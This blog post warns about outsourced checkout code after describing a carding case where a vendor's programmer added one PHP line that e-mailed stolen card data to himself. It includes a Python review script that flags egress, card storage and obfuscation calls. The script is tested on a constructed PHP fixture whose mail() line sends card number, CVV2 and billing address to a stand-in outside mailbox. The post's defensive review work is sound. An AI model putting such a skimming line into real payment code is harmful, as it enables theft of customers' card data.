After sharing some thoughts with friends, I got some links to visit and some things to read. The results were petrifying, to say the least. It’s not the end of the world, but it does raise concerns about outsourcing as a whole.
The web forum I had a chance to visit (no URL here, for obvious reasons) is dedicated to carding. You don’t know what this is? Oh, that’s easy – carding is when you open your monthly statement honestly believing that you paid off this credit card last month, and then – mwa-ha-ha (aka evil laughter) – you see that you have spent quite some money ordering stuff you had no idea about, and that the goods were shipped somewhere you also have no idea of. That’s it – you have just been carded. Meaning: your credit card number has been stolen by someone else, and all the money was used to order goods that were shipped across the country.
But how is this possible? – you might want to ask. And here’s where the concern arises. Some credit card numbers are stolen by bad guys who break into large companies and steal huge batches of numbers. Banks are usually aware of this, take charge, and change your number and PIN almost immediately. This is bad for the banks, but merely an inconvenience for you.
What’s worse is when numbers are stolen from small merchants. The following example is an actual real-world case that I found on the above-mentioned forum. No names were given, so unfortunately I cannot warn the owners of the cards or other people who might be affected. The stolen credit card information included card numbers, CVV2 codes, billing addresses and phone numbers – pretty much all the information you need to place an order on a merchant website. The interesting thing is how it got stolen. It was not through a security breach (which would be understandable); it came from the scripts that were developed by an outsourcing vendor. Apparently someone didn’t review the code after it was submitted by programmers from Russia. The trick is that some vendors keep credit card information in their databases (God knows why). So when a user pays for a service or goods, the credit card info gets submitted to the database. The programmer only had to add one extra PHP line that e-mails him the same data that gets transmitted to the merchant’s credit card processor. This way the process of stealing credit cards gets automated…
Back from article mode. When I outsource things, there are two requirements that must be met. First – I must see the source code. Second – I myself will install all the scripts. This usually weeds out those who wish to plant their “seeds of evil” in otherwise perfectly working scripts (and they must work properly, because otherwise the owner or the clients would suspect a problem). Of course it doesn’t totally guarantee security, but it adds at least some level of protection for customers.
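To make the “I must see the source code” requirement concrete, here is an added example (my own code, not anything from the forum or from the vendor described above) of the kind of review helper I run over delivered PHP checkout scripts before installing them. It flags three things a reviewer should look at in any file that touches card data: calls that send data out of the process (mail, sockets, logs), SQL that writes card variables to the merchant database, and obfuscation or dynamic-code functions that have no business in a checkout script. The `audit_php` function, the call lists and the regexes are my assumptions about what is worth flagging, and `SAMPLE_CHECKOUT` is a constructed PHP fixture written to resemble the case in the post, not real merchant code.

```python
"""Review helper: flag data egress, card storage and obfuscation in PHP checkout code.

Added example for the post above; the heuristics are the author's assumptions,
and the PHP fixture is constructed, not real merchant code.
"""
import re
from dataclasses import dataclass

# Functions that move data somewhere other than the intended payment processor.
EGRESS_CALLS = {
    "mail", "curl_exec", "fsockopen", "stream_socket_client",
    "file_put_contents", "fwrite", "error_log", "syslog",
}
# Functions that mostly appear in code trying to hide what it does.
OBFUSCATION_CALLS = {"eval", "base64_decode", "gzinflate", "str_rot13", "create_function"}
# Variable names that suggest cardholder data is in play ($card_number, $cvv2, $expiry ...).
CARD_NAME_RE = re.compile(r"\$\w*(?:card|cc_?num|cvv|cvc|expir)\w*", re.I)
# A bare function call: identifier followed by an opening parenthesis.
CALL_RE = re.compile(r"\b([A-Za-z_]\w*)\s*\(")
INSERT_RE = re.compile(r"\binsert\s+into\b", re.I)


@dataclass(frozen=True)
class Finding:
    line: int
    severity: str
    call: str
    reason: str


def audit_php(source: str) -> list:
    """Return review findings for one PHP file, ordered by line number.

    Line-by-line heuristic: statements spanning several lines and comments
    inside strings are not handled, which is fine for a review aid.
    """
    lines = source.splitlines()
    # If the file references card variables anywhere, every egress call needs a reason.
    handles_cards = any(CARD_NAME_RE.search(line) for line in lines)
    findings = []
    for no, raw in enumerate(lines, 1):
        line = raw.strip()
        if not line or line.startswith(("//", "#", "/*", "*")):
            continue  # skip blank lines and whole-line comments
        calls = {c.lower() for c in CALL_RE.findall(line)}
        card_refs = CARD_NAME_RE.findall(line)
        for c in sorted(calls & OBFUSCATION_CALLS):
            findings.append(Finding(no, "HIGH", c, "obfuscation or dynamic code in a checkout script"))
        if INSERT_RE.search(line) and card_refs:
            findings.append(Finding(no, "HIGH", "INSERT",
                                    "cardholder data written to the merchant database (" + ", ".join(card_refs) + ")"))
        for c in sorted(calls & EGRESS_CALLS):
            if card_refs:
                findings.append(Finding(no, "HIGH", c, "sends cardholder data (" + ", ".join(card_refs) + ")"))
            elif handles_cards:
                findings.append(Finding(no, "MEDIUM", c, "data leaves the process in a file that handles card data"))
    return findings


# Constructed fixture shaped like the case in the post: a working checkout with
# one database write of card data and one extra line that copies it elsewhere.
SAMPLE_CHECKOUT = """\
<?php
// checkout.php: constructed sample for the review demo, not real merchant code
$card_number = $_POST['card_number'];
$cvv2        = $_POST['cvv2'];
$billing     = $_POST['billing_address'];
// legitimate hand-off to the payment processor
$result = $processor->charge($card_number, $cvv2, $billing);
// the practice the post questions: keeping card data in the merchant database
mysqli_query($db, "INSERT INTO orders (card_number, cvv2) VALUES ('$card_number', '$cvv2')");
error_log("order " . $order_id . " status " . $result->status);
// the kind of extra line the post describes: a copy of every card to an outside mailbox
mail('drop@example.invalid', 'new order', "$card_number|$cvv2|$billing");
?>
"""


def main() -> None:
    for f in audit_php(SAMPLE_CHECKOUT):
        print(f"line {f.line:>3}  {f.severity:<6} {f.call:<12} {f.reason}")


if __name__ == "__main__":
    main()
```

Run against the fixture, it reports the database INSERT and the `mail()` line as HIGH and the `error_log()` call as MEDIUM; the same `mail()` call in a file that never touches card variables is not reported, so the output stays short enough to actually read before installation. The point is not that the script catches every trick, but that every flagged line must be explained by the vendor before the code goes live.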
On the other hand, there’s no way the owner of the store can protect himself from the chargeback if someone makes a purchase with a stolen credit card. Unfortunately…